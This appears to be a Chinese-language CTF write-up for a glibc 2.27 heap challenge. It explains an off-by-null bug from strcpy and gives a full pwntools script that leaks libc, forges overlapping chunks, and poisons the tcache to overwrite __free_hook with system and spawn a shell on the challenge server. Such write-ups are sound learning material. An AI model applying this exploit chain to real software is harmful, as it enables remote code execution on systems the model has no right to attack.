no坑no题。这题的坑太害人
看上去是个简单的堆里,edit name时用strcpy有off_by_null漏洞,只需要作ABC t先释放A通过B修改c的pre_inuse=0,再释放C得到合并。再申请到B,释放B,再写入free_hook就行了
漏洞点:
strcpy复制时会在尾部带\0
unsigned __int64 m2edit()
{
int v0; // eax
unsigned int v2; // [rsp+Ch] [rbp-44h] BYREF
char s[8]; // [rsp+10h] [rbp-40h] BYREF
char v4[48]; // [rsp+18h] [rbp-38h] BYREF
unsigned __int64 v5; // [rsp+48h] [rbp-8h]
v5 = __readfsqword(0x28u);
memset(s, 0, 0x30uLL);
puts("Which one?");
__isoc99_scanf("%u", &v2);
if ( dword_20203C && v2 <= 0x10 && *((_QWORD *)&unk_202048 + 3 * v2) )
{
printf("New name:");
readn((__int64)v4, 40);
strcpy(*((char **)&unk_202048 + 3 * v2), v4);// off_by_null
printf("New goods:");
步骤:
- 由于有size限制不能直接释放到unsort所有,先建12个块(大概用到10个)
- 释放7个填满tcache,再释放得到unsort
- 建1字节块,写1个字节得到libc(没有show,但输入后会回显)
- 这时候可能edit1.name利用off_by_null修改3的pre_inuse。但写满40后会有个垃圾字节。经过反复测试发现这个垃圾是上一次建块的size。
- 选建个100,然后通过ABC方法,向前合并,得到重叠tcache_attack
from pwn import *
local = 0
def connect():
global p,libc_elf,one,libc_start_main_ret
if local == 1:
p = process('./pwn')
libc_elf = ELF('/home/shi/pwn/libc6_2.27-3u1/lib64/libc-2.27.so')
one = [0x4240e, 0x42462, 0xc4f7f, 0xe31fa, 0xe31ee]
libc_start_main_ret = 0x21a87
else:
p = remote('node4.buuoj.cn', 28353)
libc_elf = ELF('../libc6_2.27-3ubuntu1_amd64.so')
one = [0x4f2c5,0x4f322,0xe569f,0xe5858,0xe585f,0xe5863,0x10a398,0x10a38c]
libc_start_main_ret = 0x21b97
elf = ELF('./pwn')
context.arch = 'amd64'
menu = b">> "
def add(size, msg=b'b\n', name=b'b\n'):
p.sendlineafter(menu, b'1')
p.sendafter(b"Order name:", name)
p.sendlineafter(b"How many:", str(size).encode())
p.sendafter(b"Goods' name:", msg)
def edit(idx, msg=b'a\n', goods=b'a\n'):
p.sendlineafter(menu, b'2')
p.sendlineafter(b"Which one?", str(idx).encode())
p.sendafter(b"New name:", msg)
p.sendafter(b"New goods:", goods)
def free(idx):
p.sendlineafter(menu, b'4')
p.sendlineafter(b"Which one?", str(idx).encode())
def pwn():
context.log_level = 'debug'
for i in range(12):
add(0xf8)
for i in range(7,-1,-1):
if i == 7:
add(0x40)
free(i)
add(1, msg=b'\xa0')
p.recvuntil(b'Goods of order[5] :')
malloc_hook = u64(p.recvline()[:-1].ljust(8, b'\x00')) -0x100 -0x60 -0x10
libc_base = malloc_hook - libc_elf.sym['__malloc_hook']
free_hook = libc_base + libc_elf.sym['__free_hook']
system = libc_base + libc_elf.sym['system']
print('libc:', hex(libc_base), hex(malloc_hook))
add(0x100, name=b'A'*0x28) #0xf8
edit(1, b'A'*0x28)
edit(1, b'A'*0x27+b'\n')
edit(1, b'A'*0x26+b'\n')
edit(1, b'A'*0x25+b'\n')
edit(1, b'A'*0x24+b'\n')
edit(1, b'A'*0x23+b'\n')
edit(1, b'A'*0x20+ p64(0x240))
add(0xf8) #2
add(0xf8) #3
free(10)
free(11)
free(3)
#
add(0x120) #3
free(0)
edit(3, goods=b'A'*0xd8 + p64(0x31) + p64(free_hook)+ b'\n')
add(0x18, name=b'/bin/sh\x00\n') #0
add(0xf8, name=p64(system)+ b'\n')
free(0)
#gdb.attach(p)
#pause()
p.sendline(b'cat /flag')
p.interactive()
connect()
pwn()